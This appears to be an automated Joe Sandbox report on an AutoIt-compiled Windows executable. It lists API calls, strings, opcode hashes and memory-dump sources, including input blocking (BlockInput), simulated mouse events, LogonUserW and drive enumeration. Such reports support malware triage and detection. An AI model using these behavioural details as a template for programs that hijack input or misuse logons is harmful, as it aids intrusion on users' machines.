• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00F06DB3,-0000031A,?,?,00000001), ref: 00F081B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F081BA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
Strings
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: @
• API String ID: 3728558374-2766056989
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
APIs
• __time64.LIBCMT ref: 00F2B6DF
  • Part of subcall function 00F0344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F2BDC3,00000000,?,?,?,?,00F2BF70,00000000,?), ref: 00F03453
  • Part of subcall function 00F0344A: __aulldiv.LIBCMT ref: 00F03473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
APIs
• BlockInput.USER32(00000001), ref: 00F36ACA
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F2750A
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
• Opcode ID: c2934fa6245a870ec1799fbd167050471726e0213032a0f50e0af87c196ad7ce
• Instruction ID: 4d175091cd8eea639dfd62df50cdcd47da53c321792126ee5a2f98e1b8c1258b
• Opcode Fuzzy Hash: c2934fa6245a870ec1799fbd167050471726e0213032a0f50e0af87c196ad7ce
• Instruction Fuzzy Hash: 1ED09EA556C765B9EC197724BC1BFB75508F304791FD84549B613D90C0A8D47D01B031
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F1AD3E), ref: 00F1B124
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 65396f8d4b90c912a8cf6eae1afa1b371edcf6367f2bd2e3316898010c1aa057
• Instruction ID: 9baa264fa0cb2c5abbcf3f31f92c299d4e35518cbc91c8946eab8c6b34fa926c
• Opcode Fuzzy Hash: 65396f8d4b90c912a8cf6eae1afa1b371edcf6367f2bd2e3316898010c1aa057
• Instruction Fuzzy Hash: C6D09E321A464EBEDF025FA4DC06EAE3F6AEB04701F448511FA25D50A1C675D531AB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 8ba60b30e86c58f580df559ceb9ea5545dad95d50167f03102e56b5f60f02e9e
• Instruction ID: 062529814e5e3d0dd51d65aa1884b09f664e297f44ab9a8571c2e3dea1575aee
• Opcode Fuzzy Hash: 8ba60b30e86c58f580df559ceb9ea5545dad95d50167f03102e56b5f60f02e9e
• Instruction Fuzzy Hash: 68C04CB280010DDFC751CBC0CD48AEEB7BCAB04301F104191D215F1110D7709B45AB72
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F0818F
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: d218cbd13cd02f74af742f50c7cc79af097ae0a4bab7c80488dde62edc7dad9e
• Instruction ID: f25b9c3664a8f59d33b29380a4f4bbbfa10ad1141927db80cf24001afb560c43
• Opcode Fuzzy Hash: d218cbd13cd02f74af742f50c7cc79af097ae0a4bab7c80488dde62edc7dad9e
• Instruction Fuzzy Hash: BFA0223000020CFBCF002F83FC0A8883F2CFB002A0B000020F80C00230CBB3A820AAC2
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77e8452952b848b2521a87b50fc18052f20fbf87ca7292e9a6a88cd1acac8af6
• Instruction ID: 5e748098e2ded9f503892515a42ae1d916b53b0be7fe732bb485f12d279a737c
• Opcode Fuzzy Hash: 77e8452952b848b2521a87b50fc18052f20fbf87ca7292e9a6a88cd1acac8af6
• Instruction Fuzzy Hash: F622CE7090024ACFDB24DF59D480ABEB7F0FF18314F189069E95AAB391E335AD85CB91
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e58336d9c8421b01df5d18c33a8fbe4f7a2df5072242b3338dabae39c729d5af
• Instruction ID: 6c01f848250da4642f4ac2d3a2b49276d80b0e814babbbb4d3f09f171a71c85f
• Opcode Fuzzy Hash: e58336d9c8421b01df5d18c33a8fbe4f7a2df5072242b3338dabae39c729d5af
• Instruction Fuzzy Hash: E4128B70A002099FDF04DFA5D981AEEB7F5FF48300F105669E806F7291EB35AA14DB60
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: e36da753e42688d4c784bf6f05d6bbccd0c64b78516f0a60b805d9b4c7e86efb
• Instruction ID: 2ad7bb665deef984dc627747f69f3c23fff6ea73abcda5c21bc7e24cd0bebd2f
• Opcode Fuzzy Hash: e36da753e42688d4c784bf6f05d6bbccd0c64b78516f0a60b805d9b4c7e86efb
• Instruction Fuzzy Hash: 7A02D270E00109EBCF04DF69D981AAEBBF5FF44300F148069E906EB295EB35DA15DB91
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: 2b67993bda13953f5df1fdc5f8047eebcfa9b522e99232a084e5c31c994b8db7
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: 88C1B2362051970ADF2D863AC43463EFAA15EA2BB571A176DD8B3CB4D5EF20C534F620
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: 50629e641760e40020d5334b1671a6f77956cf57d870da5749834e591a2f4527
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: D2C1D0332051970AEF2D463AC43463EBAA15EA2BB571A176DD4B3CB5D5EF20C534F620
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction ID: 5f97921449794568769d0955516838bf1024c7ed5335cd65a61b530dfa0b3fbf
• Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction Fuzzy Hash: 94C1C1322051970ADF2D463A843463EBBA15FA2BB971A137DD4B3DB4D5EF20C534E620
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 9ec35c96382244b66631fa824783048706b92ae7a62704724bd03a34002e41f9
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 86C1C23220509B09DF2D463AC47053EFAA15EA2BB931A277DD5B3EB5D5EF20C534D620
APIs
• DeleteObject.GDI32(00000000), ref: 00F3A2FE
• DeleteObject.GDI32(00000000), ref: 00F3A310
• DestroyWindow.USER32 ref: 00F3A31E
• GetDesktopWindow.USER32 ref: 00F3A338
• GetWindowRect.USER32(00000000), ref: 00F3A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F3A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F3A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A4D8
• GetClientRect.USER32(00000000,?), ref: 00F3A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F3A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A55E
• GlobalLock.KERNEL32(00000000), ref: 00F3A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A576
• GlobalUnlock.KERNEL32(00000000), ref: 00F3A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A586
• GlobalFree.KERNEL32(00000000), ref: 00F3A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F6D9BC,00000000), ref: 00F3A5B9
• GlobalFree.KERNEL32(00000000), ref: 00F3A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F3A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F3A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: 10fe08409f4f58eb043c3266afeb710582912fe91d9e0c71c06066b66244e877
                                                                                        • Instruction ID: 1d2cfc09a4c7cbecaaa5a16ae682d7cb4f16a8166bc43a32af50c1f34fcd080c
                                                                                        • Opcode Fuzzy Hash: 10fe08409f4f58eb043c3266afeb710582912fe91d9e0c71c06066b66244e877
                                                                                        • Instruction Fuzzy Hash: AA027D75A00218EFDB14DFA5DD89EAE7BB9FB49320F008158F915AB2A1C770DD41EB60
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00F4D2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F4D30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 00F4D318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00F4D332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F4D341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D36C
                                                                                        • GetSysColor.USER32(00000010), ref: 00F4D374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00F4D37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00F4D38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F4D391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F4D3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 00F4D40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4D439
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(00000012), ref: 00F4D5AE
                                                                                          • Part of subcall function 00F4D575: SetTextColor.GDI32(?,?), ref: 00F4D5B2
                                                                                          • Part of subcall function 00F4D575: GetSysColorBrush.USER32(0000000F), ref: 00F4D5C8
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(0000000F), ref: 00F4D5D3
                                                                                          • Part of subcall function 00F4D575: GetSysColor.USER32(00000011), ref: 00F4D5F0
                                                                                          • Part of subcall function 00F4D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4D5FE
                                                                                          • Part of subcall function 00F4D575: SelectObject.GDI32(?,00000000), ref: 00F4D60F
                                                                                          • Part of subcall function 00F4D575: SetBkColor.GDI32(?,00000000), ref: 00F4D618
                                                                                          • Part of subcall function 00F4D575: SelectObject.GDI32(?,?), ref: 00F4D625
                                                                                          • Part of subcall function 00F4D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00F4D644
                                                                                          • Part of subcall function 00F4D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4D65B
                                                                                          • Part of subcall function 00F4D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00F4D670
                                                                                          • Part of subcall function 00F4D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4D698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        • Opcode ID: dd01a9bd4eb2f0e1d83715eefc5d9dd92e4f25f9733107af3cdb77c781e04ad0
                                                                                        • Instruction ID: dc56047613f455b546dae3137bc73e30cc1c24f7f1ed4362152a49fb2f23ff9b
                                                                                        • Opcode Fuzzy Hash: dd01a9bd4eb2f0e1d83715eefc5d9dd92e4f25f9733107af3cdb77c781e04ad0
                                                                                        • Instruction Fuzzy Hash: 5191D172908309BFDB109F64DC08E6B7BA9FF89325F140A19F962961E0C7B1D940EB52
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2DBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,00F7DC54,?,\\.\,00F7DC00), ref: 00F2DCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,00F7DC54,?,\\.\,00F7DC00), ref: 00F2DE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 979fe1ac758eefd1c987249fabf041e630ed8a1df165422a35e1c0780aac1f8f
                                                                                        • Instruction ID: abf8794197c4eb9c849f9c830ca8024f9e629e343e403f277750fe098e2a7e85
                                                                                        • Opcode Fuzzy Hash: 979fe1ac758eefd1c987249fabf041e630ed8a1df165422a35e1c0780aac1f8f
                                                                                        • Instruction Fuzzy Hash: 8651E23164CB66AF8B10DF10E881929B7E0FB94715B60581AF017EB2A1DB70D945FB43
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: df239b60eaa702c21373b0d6028ed0e11fe1dcaf5deb12a62db8a0fc73dd252a
                                                                                        • Instruction ID: efdaf4317a19af9fb995d7ea71a6a2ec644e03c1c24c0d3d3e09f4393fed1951
                                                                                        • Opcode Fuzzy Hash: df239b60eaa702c21373b0d6028ed0e11fe1dcaf5deb12a62db8a0fc73dd252a
                                                                                        • Instruction Fuzzy Hash: 01812C3064025DBBCB24AB65DC43FBF77B8AF15301F245125FE09761C2EB61DA06E292
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00F4C788
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F4C83E
                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F4C859
                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00F4CB15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: 0
                                                                                        • API String ID: 2326795674-4108050209
                                                                                        • Opcode ID: e644e7eaf7d53c7f4ba6a75d1a7ecc65ddbc9d4d4386081ecf48a570c4eef007
                                                                                        • Instruction ID: 131d340a3202982d109df43ac3cb2b2ef9515b4508c708eb7ffa59ba6615bf6d
                                                                                        • Opcode Fuzzy Hash: e644e7eaf7d53c7f4ba6a75d1a7ecc65ddbc9d4d4386081ecf48a570c4eef007
                                                                                        • Instruction Fuzzy Hash: 0DF10271A06304AFE3618F24CC85BAABFE4FF49364F081529F999D22A1C775C840EBD1
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00F7DC00), ref: 00F46449
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        • Opcode ID: 7659b48eeb66b1d356052f3f158b796c2f4f77bde088951eb27d4d4b76098e7e
                                                                                        • Instruction ID: ff49f4d0be7e27404704662717c7f1744d63d2577f2442910992b88fc8cf54d9
